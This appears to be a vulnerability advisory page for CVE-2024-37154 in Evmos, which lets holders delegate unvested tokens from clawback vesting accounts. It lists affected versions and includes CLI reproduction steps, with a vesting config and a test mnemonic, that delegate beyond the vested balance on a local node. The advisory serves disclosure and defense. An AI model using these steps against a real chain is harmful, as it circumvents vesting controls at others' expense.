Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS03aHJoLXY2d3AtNTN2d84AA8ww
Evmos allows unvested token delegations
Impact
What kind of vulnerability is it? Who is impacted?
At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via ClawbackVestingAccount.
Patches
Has the problem been patched? What versions should users upgrade to?
The PR linked to this advisory includes part of the fix. The remainder is in a second advisory on the Cosmos SDK fork.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.
References
Are there any links users can visit to find out more?
See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:
- Download
vesting_setup.jsonwith the following contents:
{
"start_time": 1679602272,
"periods": [
{
"coins": "100000000000000000000aevmos",
"length_seconds": 10
},
{
"coins": "100000000000000000000aevmos",
"length_seconds": 259200000
}
]
}
- Run the following CLI commands to reproduce the issue locally:
evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes
# Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested
evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd
evmosd keys add key1 --recover --home ~/.tmp-evmosd
# Enter the following mnemonic
skate tell option purity cattle poverty street act bone govern way various
evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address
# Substitute the operator address from the previous query
# Note that this delegates 70% of the user's available stake
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes
# Re-run the same command
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes
# Note that the total delegations now exceed the user's vested balance
evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03aHJoLXY2d3AtNTN2d84AA8ww
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 3 months ago
Updated: 3 months ago
CVSS Score: 5.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Identifiers: GHSA-7hrh-v6wp-53vw, CVE-2024-37154
References:
- https://github.com/evmos/evmos/security/advisories/GHSA-7hrh-v6wp-53vw
- https://nvd.nist.gov/vuln/detail/CVE-2024-37154
- https://pkg.go.dev/vuln/GO-2024-2904
- https://github.com/advisories/GHSA-7hrh-v6wp-53vw
Blast Radius: 2.5
Affected Packages
go:github.com/evmos/evmos/v6
Dependent packages: 25Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 6.0.4
No known fixed version
All affected versions: 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4
go:github.com/evmos/evmos/v7
Dependent packages: 1Dependent repositories: 3
Downloads:
Affected Version Ranges: <= 7.0.0
No known fixed version
All affected versions: 7.0.0
go:github.com/evmos/evmos/v8
Dependent packages: 3Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 8.2.3
No known fixed version
All affected versions: 8.0.0, 8.1.0, 8.1.1, 8.2.0, 8.2.2, 8.2.3
go:github.com/evmos/evmos/v9
Dependent packages: 9Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 9.1.0
No known fixed version
All affected versions: 9.0.0, 9.1.0
go:github.com/evmos/evmos/v10
Dependent packages: 2Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 10.0.1
No known fixed version
All affected versions: 10.0.0, 10.0.1
go:github.com/evmos/evmos/v11
Dependent packages: 9Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 11.0.2
No known fixed version
All affected versions: 11.0.0, 11.0.1, 11.0.2
go:github.com/evmos/evmos/v12
Dependent packages: 24Dependent repositories: 3
Downloads:
Affected Version Ranges: <= 12.1.6
No known fixed version
All affected versions: 12.0.0, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.4, 12.1.5, 12.1.6
go:github.com/evmos/evmos/v13
Dependent packages: 9Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 13.0.2
No known fixed version
All affected versions: 13.0.0, 13.0.1, 13.0.2
go:github.com/evmos/evmos/v14
Dependent packages: 5Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 14.1.0
No known fixed version
All affected versions: 14.0.0, 14.1.0
go:github.com/evmos/evmos/v15
Dependent packages: 1Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 15.0.0
No known fixed version
All affected versions: 15.0.0
go:github.com/evmos/evmos/v16
Dependent packages: 0Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 16.0.4
No known fixed version
All affected versions: 16.0.0, 16.0.1, 16.0.2, 16.0.3, 16.0.4
go:github.com/evmos/evmos/v17
Dependent packages: 0Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 17.0.1
No known fixed version
All affected versions: 17.0.0, 17.0.1
go:github.com/evmos/evmos/v18
Dependent packages: 0Dependent repositories: 0
Downloads:
Affected Version Ranges: <= 18.1.0
No known fixed version
All affected versions: 18.0.0